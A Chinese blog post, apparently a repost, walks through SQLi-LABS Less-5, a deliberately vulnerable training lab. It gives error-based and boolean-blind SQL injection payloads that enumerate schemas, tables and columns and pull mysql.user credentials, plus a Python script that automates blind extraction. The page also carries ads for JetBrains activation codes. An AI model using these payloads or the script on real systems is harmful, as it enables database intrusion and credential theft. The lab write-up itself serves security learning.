SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」sqlilabs第五关,sqli-labesless-5,sqlilabsless5

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

第五关是单引号字符型注入,推荐使用报错注入、布尔盲注

方式一:报错注入

推荐文章:报错注入使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1′

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 单引号导致,页面显示数据库的报错信息,确定注入点为单引号字符型

第二步、判断报错报错函数是否可用

地址栏输入:?id=0′ and updatexml(1,0x7e,3) — a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 页面正常报错,确定报错函数可用。

第三步、脱库

获取所有数据库,地址栏输入:

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(schema_name) 
          from information_schema.schemata)
       )
	,34,31)
,3) -- a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

获取 security 库中的所有表,地址栏输入:

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(table_name) 
          from information_schema.tables
          where table_schema="security")
       )
	,1,31)
,3) -- a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 获取 users 表中的所有字段,地址栏输入:

?id=1' and updatexml(1,
	substr(
      concat(0x7e,
          (select group_concat(column_name) 
          from information_schema.columns
          where table_schema="security" and table_name="users")
       )
	,1,31)
,3) -- a

 SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 获取数据库的管理员的密码,地址栏输入:

?id=1' and updatexml(1,
	concat(0x7e,(
        select group_concat(user,password) 
        from mysql.user 
        where user = 'mituan')
     ),
3) -- a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 

方式二:布尔盲注

推荐文章:布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入点

地址栏输入:?id=1′ and 1 — a,页面正常显示 

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 地址栏输入:?id=1′ and 0 — a,页面异常(空)显示

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

第二步、判断长度

判断当前所有数据库的长度是否大于2(肯定大于),地址栏输入:

?id=1' and length(
	(select group_concat(schema_name)
    from information_schema.schemata)
) > 2 -- a

 SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 页面正常显示,确定payload可用,文末使用脚本自动化判断

第三步、枚举字符

判断所有数据库名的第1个字符的ascll码是否大于1(肯定大于1),地址栏输入:

?id=1' and ascii(
	substr(
		(select group_concat(schema_name)
		from information_schema.schemata)
	,1,1)
) >1 -- a

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 页面正常显示,确定payload可用,文末使用脚本枚举字符。

第四步、脱库

盲注脚本如下,按照提示修改:

import requests

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址(不带参数)
url = "http://70ee4e0d244e4ca5a00526d0f4e48b26.app.mituan.zone/Less-5/"
# 猜解长度使用的payload
payload_len = """?id=1' and length(
	                (select group_concat(user,password)
                    from mysql.user)
                ) = {n} -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' and ascii(
	                substr(
		                (select group_concat(user,password)
		                from mysql.user)
	                ,{n},1)
                ) = {r} -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面中出现此内容则表示成功
        if 'You are in...........' in response.text:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # 页面中出现此内容则表示成功
            if 'You are in...........' in response.text:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

获取所有数据库

判断长度的payload:

?id=1' and length(
	(select group_concat(schema_name)
    from information_schema.schemata)
) ={n} -- a

枚举字符的payload:

?id=1' and ascii(
	substr(
		(select group_concat(schema_name)
		from information_schema.schemata)
	,{n},1)
) ={r} -- a

执行结果:

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 获取 security 库中的所有表

判断长度的payload:

?id=1' and length(
	(select group_concat(table_name)
    from information_schema.tables
    where table_schema="security")
) ={n} -- a

枚举字符的payload:

?id=1' and ascii(
	substr(
		(select group_concat(table_name)
		from information_schema.tables
        where table_schema="security")
	,{n},1)
) ={r} -- a

执行结果:

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 获取 users 表的所有字段

判断长度的payload:

?id=1' and length(
	(select group_concat(column_name)
    from information_schema.columns
    where table_schema="security" and table_name="users")
) ={n} -- a

枚举字符的payload:

?id=1' and ascii(
	substr(
		(select group_concat(column_name)
		from information_schema.columns
        where table_schema="security" and table_name="users")
	,{n},1)
) ={r} -- a

执行结果:

SQLi LABS Less-5 报错注入+布尔盲注「建议收藏」

 推荐专栏

《网络安全快速入门》用最短的时间,掌握最核心的网络安全技术。

《靶场通关教程》各种靶场的通关教程,持续更新……

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/187726.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • realsense深度图像保存方法

    realsense深度图像保存方法一般使用realsense时会保存视频序列,当保存深度图像时,需要注意保存的图像矩阵的格式,不然可能造成深度值的丢失。在众多图像库中,一般会使用opencv中的imwrite()函数进行深度图像的保存。一般深度图像中深度值的单位是mm,因此一般使用np.uint16作为最终数据格式保存。例子:importnumpyasnpimportcv2deffun1(…

  • c#窗体添加背景音乐_eclipse怎么添加背景音乐

    c#窗体添加背景音乐_eclipse怎么添加背景音乐一.在项目中新建一个文件夹,然后将音乐文件导入:二.添加音乐代码如下:usingSystem.Media;//在命名空间中添加stringegm=”../../music/3.wav”;//定义变量来存储音频路径SoundPlayerbgm=newSoundPlayer(egm);//控制声音播放bgm.Play();//开始播放音乐bgm.Stop();//停……

  • Java程序设计(基础)- 概述

    Java程序设计(基础)- 概述

  • docker -t_docker -f

    docker -t_docker -f在面试中关于多线程同步,你必须要思考的问题一文中,我们知道glibc的pthread_cond_timedwait底层是用linuxfutex机制实现的。理想的同步机制应该是没有锁冲突时在用户态利用原子指令就解决问题,而需要挂起等待时再使用内核提供的系统调用进行睡眠与唤醒。换句话说,在用户态的自旋失败时,能不能让进程挂起,由持有锁的线程释放锁时将其唤醒?如果你没有较深入地考虑过这个问题,很可能…

  • AMQP机制_cdm机制为什么停止了

    AMQP机制_cdm机制为什么停止了当前各种应用大量使用异步消息模型,并随之产生众多消息中间件产品及协议,标准的不一致使应用与中间件之间的耦合限制产品的选择,并增加维护成本。AMQP是一个提供统一消息服务的应用层标准协议,基于此协议的客户端与消息中间件可传递消息,并不受客户端/中间件不同产品,不同开发语言等条件的限制。        当然这种降低耦合的机制是基于与上层产品,语言无关的协议。AMQP协议是一种二进制协议,提供

    2022年10月31日
  • 读书笔记摘抄读后感大全_谈美读书笔记摘抄感悟

    读书笔记摘抄读后感大全_谈美读书笔记摘抄感悟推荐序1 什么是小米跟苹果正面撕的底气?认知盈余是所有互联网商业模式的一大基础理论,我用一句话总结为:下班时间产生的革命性力量。小米模式的本质,用雷军的话说,就是:硬件+互联网+新零售。品牌的竞争VS流量的竞争乔布斯认为,品牌仅次于技术。他有一个品牌秘方:革命性技术与营销的结合才是苹果成功的关键。苹果能卖出这么高的溢价,最重要一招就是品牌效应,而且是爆品级的品牌效应。我称之为:爆品+品牌…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号